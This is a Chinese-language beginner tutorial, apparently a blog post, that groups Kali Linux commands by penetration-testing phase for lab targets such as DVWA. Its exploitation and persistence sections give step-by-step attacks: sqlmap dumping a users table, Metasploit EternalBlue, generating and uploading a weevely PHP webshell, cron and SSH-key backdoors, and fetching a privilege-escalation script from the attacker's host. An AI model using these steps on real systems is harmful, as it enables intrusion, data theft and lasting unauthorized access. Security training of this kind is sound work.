作为一个从 “连虚拟机都不会装” 到能独立用 Kali 做渗透测试的网安新人我最懂刚接触 Kali 时的迷茫 —— 黑底白字的终端里输入ls能看到文件输入nmap却报错 “命令不存在”对着满屏英文参数发呆不知道从哪开始学。直到我在这个行业摸爬滚打了两三年才明白Kali 命令不是 “字典”而是 “工具包”—— 按 “信息收集、漏洞扫描、漏洞利用” 等场景分类记忆比孤立记几百个命令高效 10 倍。这篇文章我会把自己整理的 “Kali Linux 核心命令手册” 全盘托出从系统基础到实战渗透每个命令都附 “功能 语法 实战例子 注意事项”零基础跟着练1 周就能上手3 周就能熟练用于靶场测试。一、先搞懂新人学 Kali 命令的 3 个核心原则避免走弯路在开始记命令前先记住 3 个原则这是我踩了无数坑总结的经验能帮你少浪费 200 小时“分类记不孤立记”比如把 “nmap、whois、dig” 归为 “信息收集类”把 “sqlmap、msfconsole” 归为 “漏洞利用类”按场景调用比背 “命令列表” 好记“先会用再深究”比如nmap先学-sSSYN 扫描、-p指定端口这 2 个常用参数能扫出目标端口就行后期再学-O操作系统探测、-A全面扫描“实战练不纸上谈兵”每学一个命令就在 DVWA、SQLI-LAB 等靶场试一次比如学sqlmap就用它跑一次 SQL 注入比单纯记参数印象深 10 倍。另外必须强调所有命令仅能在 “授权环境”如自己搭建的靶场、企业 SRC 测试区使用未经授权扫描或攻击他人系统涉嫌违法二、Kali 命令分类详解从基础到实战每个命令都带例子我把 Kali 常用命令分为 6 大类覆盖 “系统基础→信息收集→漏洞扫描→漏洞利用→权限维持→文件操作”每个命令都附 “新手必学参数” 和 “靶场实战例子”直接复制就能用。一系统基础命令新人第一天必学这类命令是操作 Kali 的基础比如打开文件、切换目录、安装工具先掌握这 8 个能避免 “连工具都装不上” 的尴尬。命令功能核心语法常用参数实战例子注意事项ls查看当前目录文件ls [参数] 目录路径-l详细信息、-a显示隐藏文件ls -l /root查看 /root 目录下文件的详细信息包括权限、大小不带参数时默认查看当前目录文件cd切换目录cd 目录路径..返回上一级、~回到家目录cd /home/kali切换到 /home/kali 目录、cd ..从当前目录返回上一级输入cd后按回车会直接回到家目录/root 或 /home/kalimkdir创建目录mkdir [参数] 目录名-p创建多级目录mkdir -p /root/test/web在 /root 下创建 test 目录再在 test 下创建 web 目录不写路径时默认在当前目录创建rm删除文件 / 目录rm [参数] 目标-r删除目录、-f强制删除不提示rm -rf /root/test强制删除 /root 下的 test 目录及所有内容慎用rm -rf /会删除整个系统文件直接变砖sudo以管理员权限执行命令sudo 命令-sudo apt update以管理员权限更新软件源Kali 默认用户名是kali密码是安装时设置的执行sudo需要输密码apt安装 / 卸载软件apt [参数] 软件名install安装、remove卸载、update更新源sudo apt install nmap安装 nmap 工具、sudo apt remove nmap卸载 nmap安装前建议先执行sudo apt update更新软件源避免安装失败ifconfig查看 / 配置网卡信息ifconfig [网卡名]-ifconfig eth0查看 eth0 网卡的 IP 地址、MAC 地址部分 Kali 版本用ip addr替代功能一样输入ip addr也能看 IPping测试网络连通性ping [参数] 目标IP/域名-c指定 ping 次数ping -c 4 baidu.comping 百度 4 次测试网络是否通畅Windows 下ping会一直发数据包Kali 下加-c指定次数否则需按CtrlC停止二信息收集命令渗透测试的 “第一步”靶场测试必学信息收集是渗透的核心比如查目标域名的 IP、扫开放端口、找网站目录这 6 个命令能帮你 “摸清目标底细”。命令功能核心语法新手必学参数实战例子以靶机 IP 192.168.1.100 为例whois查域名注册信息所有者、邮箱、服务器whois 域名-whois baidu.com查百度域名的注册商、到期时间nmap网络扫描端口、服务、操作系统nmap [参数] 目标IP/域名-sSSYN 半开放扫描快且隐蔽、-p指定端口如 1-1000、-O探测操作系统nmap -sS -p 1-1000 192.168.1.100扫描靶机 1-1000 端口看哪些端口开放dig查 DNS 解析域名对应的 IP、DNS 服务器dig 域名指定 DNS 服务器如 8.8.8.8dig baidu.com查百度的 DNS 解析记录看对应的 IPdirb网站目录爆破找隐藏的后台、备份文件dirb 目标URL 字典路径-w使用字典dirb http://192.168.1.100/dvwa /usr/share/wordlists/dirb/common.txt用默认字典爆破 DVWA 靶场的目录找后台登录页whatweb识别网站 CMS如织梦、WordPress、中间件whatweb 目标URL-whatweb http://192.168.1.100识别靶机网站用的 CMS 和服务器中间件如 Apache、Nginxsslyze查网站 SSL 证书信息漏洞检测sslyze 目标域名-regular常规检测sslyze baidu.com查百度 SSL 证书是否有漏洞如 Heartbleed实战场景串联比如要测试 DVWA 靶机IP 192.168.1.100先执行nmap -sS -p 80,3306 192.168.1.100确认 80Web和 3306MySQL端口开放再用whatweb http://192.168.1.100/dvwa确认是 DVWA 框架最后用dirb爆破目录找后台登录页通常是 /login.php。三漏洞扫描命令快速找出目标 “弱点”不用手动一个个试漏洞扫描工具能自动检测目标的漏洞如 SQL 注入、XSS新手先掌握这 3 个能省 80% 的手动测试时间。命令功能核心语法新手必学参数实战例子xrayWeb 漏洞扫描SQL 注入、XSS、文件上传xray [模式] --target 目标URLwebscanWeb 扫描模式、--output保存报告./xray webscan --target http://192.168.1.100/dvwa --output dvwa_vuln.html扫描 DVWA 靶场的 Web 漏洞结果保存为 HTML 报告gobuster目录 / 子域名爆破比 dirb 更快gobuster [模式] -u 目标 -w 字典dir目录爆破、dns子域名爆破、-w字典路径gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt用 Gobuster 爆破靶机目录openvas综合漏洞扫描支持系统、Web、数据库漏洞openvas-start启动服务-1. 执行openvas-start自动打开浏览器界面 2. 新建 “Task”输入靶机 IP 192.168.1.100 3. 开始扫描结束后查看漏洞报告如 MS17-010 永恒之蓝漏洞注意xray需要先从官网下载Kali 默认不预装解压后在终端进入解压目录用./xray执行openvas启动后默认用户名和密码需要用openvasmd --useradmin --new-password123456重置123456 是新密码可自定义。四漏洞利用命令“攻击” 目标的核心从 “找漏洞” 到 “拿权限”找到漏洞后用这些命令利用漏洞如 getshell、导出数据库新手先聚焦 Web 漏洞利用内网渗透后期再学。命令功能核心语法新手必学参数实战例子以 DVWA 靶场 SQL 注入为例sqlmapSQL 注入利用导出数据库、执行命令sqlmap -u 目标URL --参数-dbs列数据库、-D 库名 --tables列数据表、-T 表名 --columns列字段、--dump导出数据1.sqlmap -u http://192.168.1.100/dvwa/vulnerabilities/sqli/?id1SubmitSubmit# --cookiesecuritylow; PHPSESSIDabc123指定 Cookie因为 DVWA 需要登录 2.sqlmap -u ... --dbs列出靶机所有数据库找到 dvwa 库 3.sqlmap -u ... -D dvwa --tables列出 dvwa 库的表找到 users 表 4.sqlmap -u ... -D dvwa -T users --dump导出 users 表数据拿到管理员账号密码msfconsole漏洞利用框架支持永恒之蓝、Struts2 等漏洞msfconsole启动框架search 漏洞名搜索漏洞模块、use 模块路径加载模块、set 参数 值设置参数、run执行利用 “永恒之蓝” 漏洞拿靶机权限 1.msfconsole启动 MSF 2.search ms17-010搜索永恒之蓝模块 3.use exploit/windows/smb/ms17_010_eternalblue加载模块 4.set RHOSTS 192.168.1.100设置靶机 IP 5.set RPORT 445设置 SMB 端口 445 6.run执行成功后拿到靶机 shellweevely生成 WebShell用于文件上传漏洞weevely generate 密码 木马文件路径generate生成木马、connect连接木马1.weevely generate 123456 /root/webshell.php生成密码为 123456 的 PHP 木马 2. 通过 DVWA 的文件上传漏洞把 webshell.php 上传到靶机 3.weevely connect http://192.168.1.100/dvwa/hackable/uploads/webshell.php 123456连接木马拿到靶机 Web 权限五权限维持命令“拿到权限后不丢失”进阶必备拿到靶机权限后需要留 “后门”避免下次重新攻击新手先学这 2 个基础后门命令。命令功能实战例子注意事项crontab定时任务后门让木马定期启动在靶机 shell 中执行 1.crontab -e编辑定时任务 2. 输入* * * * * /root/backdoor.sh每分钟执行一次 backdoor.sh 木马 3. 按CtrlX保存输入Y确认仅在 Linux 靶机有效Windows 靶机用 “任务计划程序” 替代ssh-keygenSSH 免密登录留后门下次直接登录在 Kali 本地执行 1.ssh-keygen生成 SSH 密钥一路按回车 2.ssh-copy-id kali192.168.1.100把公钥传到靶机kali 是靶机用户名 3. 下次登录直接输ssh kali192.168.1.100不用输密码靶机需要开启 SSH 服务sudo service ssh start且允许密钥登录六文件操作命令处理靶机文件下载数据、上传工具拿到权限后需要下载靶机的敏感文件如数据库备份或上传工具如提权脚本这 3 个命令必学。命令功能实战例子wget从网络下载文件到本地在靶机 shell 中执行wget http://192.168.1.200/privesc.sh从 Kali 的 HTTP 服务下载提权脚本 privesc.sh192.168.1.200 是 Kali 的 IP需先在 Kali 启动 HTTP 服务python3 -m http.server 80在脚本所在目录执行curl下载文件 / 发送 HTTP 请求curl -O http://192.168.1.200/privesc.sh和 wget 功能类似-O 保存文件为原文件名比 wget 支持更多协议如 HTTPS但下载大文件时 wget 更稳定sz/rz本地与靶机互传文件需靶机支持1. 在 Kali 终端用ssh登录靶机后输入rz弹出窗口选择本地文件上传到靶机 2. 输入sz 靶机文件路径把靶机文件下载到本地部分靶机可能没装 lrzsz 工具需先执行sudo apt install lrzsz安装三、新人进阶Kali 命令学习路径图3 周从入门到熟练为了帮你规划学习节奏我画了一张 “3 周学习路径图”按天分配任务跟着练就能逐步掌握四、新人必看3 个命令记忆技巧 2 个练习环境1. 命令记不住试试这 3 个技巧“高频命令贴桌面”把nmap、sqlmap、msfconsole的常用参数写在便利贴上贴在电脑旁用的时候看一眼3 次就记住“写实战笔记”每次用命令解决问题后记录 “命令 参数 效果”比如 “sqlmap -u ... --dbs列出靶机数据库”下次忘的时候翻笔记“用别名简化命令”比如把nmap -sS -p 1-1000简化为nmap快速扫描编辑~/.bashrc文件添加alias nmap快速扫描nmap -sS -p 1-1000保存后执行source ~/.bashrc下次输入nmap快速扫描 192.168.1.100就能用。2. 安全练习环境推荐本地靶场DVWAWeb 漏洞练习、SQLI-LABSQL 注入专项、VulnHub虚拟机靶机如 Metasploitable 3在线平台Hack The Box需注册有免费靶机、TryHackMe新手友好有引导式练习。五、总结很多新人觉得 Kali 命令难是因为一开始就想 “记住所有命令”—— 其实没必要。我现在做渗透测试常用的命令也就 30 个左右剩下的需要时查笔记就行。记住学习 Kali 的核心是 “解决问题”不是 “背命令”。比如你需要 “找靶机的 Web 漏洞”就想到用xray扫描需要 “拿 SQL 注入的权限”就想到用sqlmap导出数据。按 “问题→命令→实战” 的逻辑学比孤立记参数高效 10 倍。收藏这篇文章遇到不会的命令就翻一翻3 周后你会发现原来 Kali Linux也没那么难。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取